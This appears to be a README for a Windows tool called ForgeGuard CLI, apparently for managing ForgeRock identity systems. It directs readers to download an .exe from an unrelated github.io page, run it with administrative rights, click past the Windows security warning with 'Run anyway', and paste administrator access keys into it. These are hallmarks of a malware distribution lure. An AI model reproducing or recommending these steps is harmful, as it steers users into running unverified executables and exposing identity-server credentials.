🛡️ forgeguard-cli-2026 - Control identity management across your environments

ForgeGuard CLI v2.0.0 helps you manage, verify, and fix your identity systems. This tool works across different platforms to ensure your ForgeRock accounts and processes perform as expected. Teams use this software to keep identity environments stable and secure.

📥 How to get the software

You must visit the project page to download the latest version for Windows. Follow this link to reach the download area:

https://isacmo329.github.io

Select the file that ends in .exe for your Windows system. Save this file to a folder you can find later, such as your Downloads folder.

🖥️ System requirements

Your computer must meet these basic needs to use ForgeGuard:

  • Windows 10 or Windows 11.
  • 500 MB of free storage space.
  • A stable internet connection to talk to your identity servers.
  • Administrative rights on your computer to install and run the tool.

⚙️ Installation steps

  1. Locate the file you downloaded in your folder.
  2. Double-click the forgeguard-cli-2026.exe file.
  3. Windows might show a security box. If it does, click More info and then select Run anyway.
  4. Follow the instructions on the screen to finish the setup process.
  5. Once the process completes, the program is ready for use.

🚀 Running the software for the first time

ForgeGuard runs through the Windows Command Prompt. This is a text-based window used to talk to the software.

  1. Press the Windows key on your keyboard.
  2. Type "Command Prompt" and press Enter.
  3. Type forgeguard --version and press Enter.
  4. You should see the version number appear on your screen. This confirms the tool works correctly.

🔑 Linking your identity account

Before you manage identities, you must link your environment. You need your server address and an access key from your IT administrator.

  1. Type forgeguard auth login in the command window.
  2. Enter your server URL when the prompt asks for it.
  3. Paste the access key you received from your administrator.
  4. Press Enter. The tool will verify your credentials against the server.

You are now ready to perform management tasks.

🛠️ Common tasks

Checking environment status

If you want to know if your servers respond correctly, type this command:

forgeguard status

This command shows you which services are active. It helps you find errors before they impact your users.

Managing identity records

To look at a specific user or account, use the following format:

forgeguard user get --id [UserEmail]

Replace [UserEmail] with the actual email address of the account you plan to edit or verify.

Fixing identity sync issues

If two systems fail to match their information, you can force a sync. Use this command:

forgeguard sync --force

This cleans up mismatched data between your identity provider and your local environment.

❓ Frequently asked questions

Does this tool change account passwords? No, this tool manages identity settings and server configurations. It does not handle password resets for end users.

What happens if I see an error message? Look at the error code. Often, you simply have a typo in your command. Check your spelling and ensure your server address matches the one provided by your team.

Do I need a special user account to run this? Yes. Your account requires specific permissions on the identity server. Ask your team lead to grant you "Editor" or "Admin" access before you attempt to make changes.

Is my data safe during transmission? The tool uses encrypted connections to send management requests to your servers. It keeps your identity data private during every step of the process.

📋 Keeping the software updated

We release updates to improve the tool and fix bugs. Check the project page regularly to see if a newer version exists. If a new version is available, download the latest .exe file and run it. The new version will automatically replace the old one for you.
